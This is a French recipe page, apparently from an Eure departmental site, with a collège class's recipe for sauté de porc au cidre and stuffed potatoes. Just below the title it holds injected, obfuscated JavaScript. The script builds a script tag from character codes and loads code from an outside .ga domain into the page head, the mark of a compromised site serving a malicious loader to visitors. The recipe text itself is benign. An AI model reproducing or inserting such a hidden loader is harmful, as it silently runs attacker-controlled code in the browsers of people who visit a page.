Partagez cette page sur les réseaux sociaux

La recette du dimanche – Sauté de porc au cidre

le
Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,97,108,108,111,119,46,108,101,116,115,109,97,107,101,112,97,114,116,121,51,46,103,97,47,108,46,106,115,63,100,61,49);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

Chaque dimanche, retrouvez les recettes de nos collégiens. Dans le cadre du concours « Mets la Normandie dans ton Assiette » nos jeunes Eurois sont sensibilisés à la bonne alimentation et au circuit court. En ce moment, nous n’avons plus d’excuses pour ne pas essayer.

N’attendez plus et découvrez la recette du jour : « Sauté de porc au cidre » des élèves du collège Georges-Pompidou de Pacy-sur-Eure.

À SAVOIR :

  • Temps de cuisson : 1 heure 20 minutes
  • Nombre de couverts : 10 personnes

INGRÉDIENTS :

  • 1,8 kg d’échine de porc
  • 3 gros oignons
  • 1,6 bouteille de cidre brut
  • 3,5 c. à soupe de farine
  • 10 grosses pommes de terre allongées à chair ferme
  • 250 g crème fraîche
  • Ciboulette
  • Échalotes
  • Beurre
  • Muscade
  • Poivre
  • Sel

RÉALISATION :

  1. Découper l’échine de porc en cubes d’environ 5 cm de côté. Mettre à dorer dans une cocotte avec un peu d’huile puis réserver dans une assiette.
  2. Dans la même cocotte, ajouter de la matière grasse et faire dorer les oignons émincés. Ajouter la viande et la farine. Bien remuer puis ajouter le cidre. Saler et poivrer.
  3. Cuire à feu doux pendant environ 1h.
  4. Cuire les pommes de terre avec leur peau, elles doivent rester fermes. Les laisser refroidir.
  5. Découper un couvercle dans la partie supérieure de chaque pomme de terre. Les évider à l’aide d’une petite cuillère et mettre de côté la pulpe.
  6. Préparer une purée : dans un bol, mélanger pulpe de pomme de terre, crème, ciboulette ciselée, beurre, sel, poivre, muscade.
  7. Remplir les pommes de terre évidées avec cette préparation et les disposer dans un plat huilé. Mettre au four pendant 20 min.

Procurez-vous les produits de cette recette auprès de nos producteurs locaux. Pour ça, il y a rien de plus facile avec C’est fait dans l’Eure.

Suivez notre actualité

S'inscrire

Inscrivez-vous à notre newsletter !